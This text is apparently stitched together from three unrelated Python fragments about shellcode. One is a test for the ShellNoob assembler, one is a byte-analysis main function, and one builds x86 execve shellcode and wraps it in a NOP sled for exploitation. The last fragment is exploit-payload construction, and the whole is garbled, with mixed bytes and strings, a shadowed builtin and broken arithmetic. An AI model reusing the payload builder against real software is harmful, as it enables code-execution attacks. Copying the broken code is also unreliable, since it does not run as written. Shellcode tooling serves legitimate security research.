def test_get_start_address(): stdout, stderr = '', '' tmp_dir = mkdtemp() asm_fp = join(tmp_dir, 'shellcode.asm') exe_fp = join(tmp_dir, 'shellcode.exe') secret_fp = '/tmp/secret' os.system('echo "%s" > %s' % (SECRET_STR, secret_fp)) kernel = ShellNoob.get_kernel() if kernel == 'Linux': shutil.copyfile( join(dirname(__file__), 'samples/x86-linux/open-read-write.asm'), asm_fp) elif kernel == 'FreeBSD': shutil.copyfile( join(dirname(__file__), 'samples/x86-freebsd/open-read-write.asm'), asm_fp) else: raise Exception('testing on kernel %s not supported' % kernel) _out, _err, _val = run_with_args('%s --to-exe' % asm_fp) stdout += _out stderr += _err assert _val == 0 snoob = ShellNoob() start_addr = snoob.get_start_address(exe_fp) assert re.match('0x[0-9a-f]+', start_addr) shutil.rmtree(tmp_dir) os.unlink(secret_fp) return stdout, stderr, 0
def main(argv): """Main method.""" args = parser.parse_args(argv[1:]) snoob = ShellNoob(args.is_64, args.intel) hexcode = extract_hex_code(snoob, args.fmt, args.fp) hexdump = hex_dump(hexcode) print_hex_dump(hexdump) inss = prohibited_bytes_analysis( snoob, hexcode, args.blacklist, args.whitelist) print_prohibited_bytes_analysis(inss)
for count in range(len(hex_code)): if count > 0 and count % 8 == 0: final_str += "push $0x%s \n" % str str = "" str += hex_code[count] final_str += "push $0x%s \n" % str shell_code += final_str + "movl %esp,%ebx\npush %eax\n" \ "push %ebx\nmov %esp, %ecx\nmovl %eax, %edx\nmov $11,%al\nint $0x80\nxor %eax,%eax\nmov $1,%al" \ "\nxor %ebx,%ebx\nint $0x80".encode("utf-8") # output_file = open("shell.asm", "w") # output_file.write(shell_code) # output_file.close() sn = ShellNoob(flag_intel=False) hex_code = sn.asm_to_hex(shell_code) hc = "\\x" for i in range(0, len(hex_code)): if i > 0 and i % 2 is 0: hc += "\\x" hc += hex_code[i] diff = to_range - from_range - hc.count('x') for i in range(0, 6): hc = i * "\\x90" + (diff / 2 * "\\x90") + hc + (diff / 2 * argv[2].decode())